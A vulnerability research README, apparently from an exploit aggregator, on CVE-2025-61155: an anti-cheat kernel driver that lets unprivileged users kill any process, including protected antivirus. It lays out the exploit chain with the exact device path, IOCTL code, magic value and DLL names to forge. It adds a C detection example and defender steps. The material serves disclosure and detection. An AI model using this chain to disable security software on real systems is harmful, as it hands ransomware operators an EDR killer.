## https://sploitus.com/exploit?id=8FA4E1EF-9BCF-5027-85E0-2F420F5171B6
# CVE-2025-61155: Arbitrary Process Termination in `GameDriverX64.sys`

[![CVE](https://img.shields.io/badge/CVE-2025--61155-red)](https://vulners.com/cve/CVE-2025-61155)
[![CVSS 3.1](https://img.shields.io/badge/CVSS_3.1-5.5_Medium-orange)](https://nvd.nist.gov/vuln/detail/CVE-2025-61155)
[![CWE](https://img.shields.io/badge/CWE-862_%2F_284-blue)](https://cwe.mitre.org/data/definitions/862.html)
[![Exploited in the wild](https://img.shields.io/badge/exploited_in_the_wild-yes-critical)](docs/05-in-the-wild.md)
[![License: MIT](https://img.shields.io/badge/License-MIT-green)](LICENSE)

A signed kernel-mode anti-cheat driver, `GameDriverX64.sys`, shipped with
**Tower of Fantasy** (Hotta Studio / Perfect World), lets **any unprivileged
local user terminate arbitrary processes**, including PPL-protected
antivirus/EDR services. It is exactly the primitive ransomware operators reach
for, and it is being **actively abused in the wild** by the *Interlock* operation
as a BYOVD EDR-killer.

This repository is a full, reproducible teardown: the security advisory, an
original IDA Pro reverse-engineering analysis, a proof of concept, and ready-to-use
detection and mitigation content.

> **Researchers:** Gabriel Maciel Ramos · Anthony Sforzin · Gabriel Gomes

## Demo



> Proof of concept terminating a target process through the driver.
> Inline player not rendering? [Download the clip](assets/demo.mp4).

## At a glance

| | |
| --- | --- |
| **Driver** | `GameDriverX64.sys` (KMDF), versions `<= 7.23.4.7` |
| **Vendor** | Hotta Studio / Perfect World (internal names `PwrdDriver` / `HtDriver2.0`) |
| **Signer** | `Fedeen Games Limited` (valid Authenticode) |
| **Device** | `\\.\HtAntiCheatDriver` |
| **Primitive** | IOCTL `0x222040`, magic `0xFA123456` → `ZwTerminateProcess` in kernel context |
| **Privileges required** | None beyond a standard local user |
| **Impact** | Terminate any process, incl. PPL AV/EDR โ†’ BYOVD EDR-killer |
| **CVSS 3.1** | 5.5 Medium · `AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` |
| **Status** | Published, **exploited in the wild** (Interlock, Reynolds) |

## The exploit chain

```
1. LoadLibrary a DLL named QmGUI.dll / QmGUI4.dll / gameuirender.dll
   └─ passes the filename-only "verification" in IRP_MJ_CREATE

2. CreateFile("\\.\HtAntiCheatDriver")          ← default DACL, any user can open

3. DeviceIoControl(0x222040, {0xFA123456, pid}) ← only gate is a hardcoded magic

4. Driver: ZwOpenProcess(GENERIC_ALL) → ZwTerminateProcess
   └─ runs with PreviousMode == KernelMode → access check skipped
   └─ kills ANY process, including protected AV/EDR
```

Three "guardrails", all defeated: the device has no admin-only ACL, the CREATE
check compares a **module name string** (forge it by loading any same-named DLL),
and the IOCTL gate is a **constant baked into the binary**. The kill then runs in
the kernel, so process protection (PPL) does not apply. Full walkthrough in
[`docs/01-technical-analysis.md`](docs/01-technical-analysis.md).
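The control code and request shape above are the whole of what a detector has to match on, so it is worth seeing them decoded. The following is an added example written for this README, not the repository's `poc/poc.cpp` and not code from the driver's authors. It unpacks `0x222040` into its `CTL_CODE` fields and runs a matching predicate over a few constructed `DeviceIoControl` telemetry records. The device path, IOCTL and magic are the ones documented above; treating the request as two little-endian 32-bit fields `{magic, pid}` is an assumption drawn from the chain summary, and the `ioctl_event` record layout is this example's own, not a real EDR schema. It is plain portable C with no Windows headers, so it compiles anywhere.

```c
/* Added example (not the repository's poc.cpp): decode the IOCTL named in
 * the README and classify constructed DeviceIoControl telemetry against it. */
#include <ctype.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HT_DEVICE_PATH "\\\\.\\HtAntiCheatDriver"   /* from the README */
#define HT_IOCTL_KILL  0x222040u                    /* from the README */
#define HT_MAGIC       0xFA123456u                  /* from the README */

/* CTL_CODE(DeviceType, Function, Method, Access) packs as
 * (DeviceType << 16) | (Access << 14) | (Function << 2) | Method. */
struct ioctl_fields { uint32_t device_type, access, function, method; };

struct ioctl_fields ioctl_decode(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;   /* 0x22 = FILE_DEVICE_UNKNOWN */
    f.access      = (code >> 14) & 0x3u;      /* 0    = FILE_ANY_ACCESS     */
    f.function    = (code >> 2)  & 0xFFFu;    /* vendor function number     */
    f.method      = code & 0x3u;              /* 0    = METHOD_BUFFERED     */
    return f;
}

/* Constructed telemetry record; the field names are this example's own. */
struct ioctl_event {
    uint32_t       pid;          /* process issuing the DeviceIoControl */
    const char    *device_path;  /* path handed to CreateFile */
    uint32_t       ioctl;        /* control code */
    const uint8_t *input;        /* input buffer as captured */
    size_t         input_len;
};

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Win32 device paths are case-insensitive, so compare accordingly. */
static bool path_eq_nocase(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
    return *a == *b;
}

/* True, with the victim PID written out, when the record is the README's
 * primitive: the anti-cheat device, IOCTL 0x222040, and a request that
 * opens with the hardcoded magic. Assumes the {magic, pid} DWORD layout. */
bool is_ht_kill_request(const struct ioctl_event *ev, uint32_t *target_pid)
{
    if (ev->device_path == NULL || !path_eq_nocase(ev->device_path, HT_DEVICE_PATH))
        return false;
    if (ev->ioctl != HT_IOCTL_KILL || ev->input == NULL || ev->input_len < 8)
        return false;
    if (le32(ev->input) != HT_MAGIC)
        return false;
    if (target_pid)
        *target_pid = le32(ev->input + 4);
    return true;
}

/* Builds a {magic, pid} request (assumed little-endian DWORD pair); used
 * here only to construct the sample records. */
void ht_encode_request(uint8_t out[8], uint32_t magic, uint32_t pid)
{
    for (int i = 0; i < 4; i++) {
        out[i]     = (uint8_t)(magic >> (8 * i));
        out[4 + i] = (uint8_t)(pid   >> (8 * i));
    }
}

int main(void)
{
    struct ioctl_fields f = ioctl_decode(HT_IOCTL_KILL);
    printf("0x%06X = CTL_CODE(DeviceType 0x%X, Function 0x%X, Method %u, Access %u)\n",
           HT_IOCTL_KILL, f.device_type, f.function, f.method, f.access);

    uint8_t kill[8], wrong_magic[8];
    ht_encode_request(kill, HT_MAGIC, 4321u);            /* constructed sample */
    ht_encode_request(wrong_magic, 0x11111111u, 4321u);  /* constructed sample */
    struct ioctl_event samples[] = {
        { 1000, HT_DEVICE_PATH,        HT_IOCTL_KILL, kill,        8 },
        { 1001, HT_DEVICE_PATH,        HT_IOCTL_KILL, wrong_magic, 8 },
        { 1002, "\\\\.\\SomeOtherDev", HT_IOCTL_KILL, kill,        8 },
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t target = 0;
        if (is_ht_kill_request(&samples[i], &target))
            printf("ALERT: pid %u asked the driver to terminate pid %u\n",
                   samples[i].pid, target);
    }
    return 0;
}
```

`0x222040` decodes to `CTL_CODE(FILE_DEVICE_UNKNOWN, 0x810, METHOD_BUFFERED, FILE_ANY_ACCESS)`. The `FILE_ANY_ACCESS` part is the detail worth noting: the I/O manager will let this request through on a handle opened with no particular access rights, which is why the permissive device DACL alone is enough for an unprivileged caller. A production rule would additionally key on the driver-load event for the `Fedeen Games Limited` signer and on the calling image, which this sample record does not carry.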

## Repository map

| Path | Contents |
| --- | --- |
| [`advisory.md`](advisory.md) | Formal security advisory |
| [`docs/01-technical-analysis.md`](docs/01-technical-analysis.md) | Original IDA Pro reverse-engineering teardown |
| [`docs/02-exploitation.md`](docs/02-exploitation.md) | Exploit chain and PoC walkthrough |
| [`docs/03-detection.md`](docs/03-detection.md) | How to detect the driver and its abuse |
| [`docs/04-mitigation.md`](docs/04-mitigation.md) | HVCI / WDAC blocking and removal |
| [`docs/05-in-the-wild.md`](docs/05-in-the-wild.md) | Interlock / BYOVD usage and timeline |
| [`poc/poc.cpp`](poc/poc.cpp) | Minimal proof of concept |
| [`detection/cve-2025-61155.yar`](detection/cve-2025-61155.yar) | YARA rules |
| [`detection/iocs.md`](detection/iocs.md) | Indicators of compromise |
| [`sample/SAMPLE.md`](sample/SAMPLE.md) | Sample identity & provenance (binary not committed) |
| [`NEWS.md`](NEWS.md) | Running log of developments |
| [`SECURITY.md`](SECURITY.md) | Responsible-use policy and contact |

## Reverse engineering

The analysis in [`docs/01-technical-analysis.md`](docs/01-technical-analysis.md)
was produced statically in **IDA Pro 9.4 + Hex-Rays** against the
legitimately-signed, vulnerable sample
(SHA-256 `9DDAE4…3C9F1E`, see [`sample/SAMPLE.md`](sample/SAMPLE.md)). Every
address, constant and decompiled snippet in this repo was lifted directly from the
binary and independently corroborates public reporting on the in-the-wild tooling.

## Defenders: start here

1. **Block** the driver via the Microsoft Vulnerable Driver Blocklist (HVCI) and/or
   a WDAC deny rule; see [`docs/04-mitigation.md`](docs/04-mitigation.md).
2. **Hunt** with the YARA rules and IOCs โ€” [`detection/`](detection/).
3. **Detect** exploitation (device opens, the `0x222040` IOCTL, kernel-origin
   process kills) โ€” [`docs/03-detection.md`](docs/03-detection.md).

## Disclaimer

For defensive security, detection engineering, education and research only. Use the
proof of concept only on systems you own or are authorized to test. See
[`SECURITY.md`](SECURITY.md). The vulnerable driver binary is intentionally not
included.

## References

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61155
- MITRE / CVE.org: https://vulners.com/cve/CVE-2025-61155
- GitHub Advisory: https://github.com/advisories/GHSA-9qfv-m6w2-fhch
- Canonical advisory (co-author): https://github.com/pollotherunner/CVE-2025-61155
- FortiGuard Labs: https://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks
- Securonix: https://connect.securonix.com/threat-research-intelligence-62/cve-2025-61155-and-interlock-ransomware-a-converging-threat-198
- Vespalec, "Tower of Flaws": https://vespalec.com/blog/tower-of-flaws/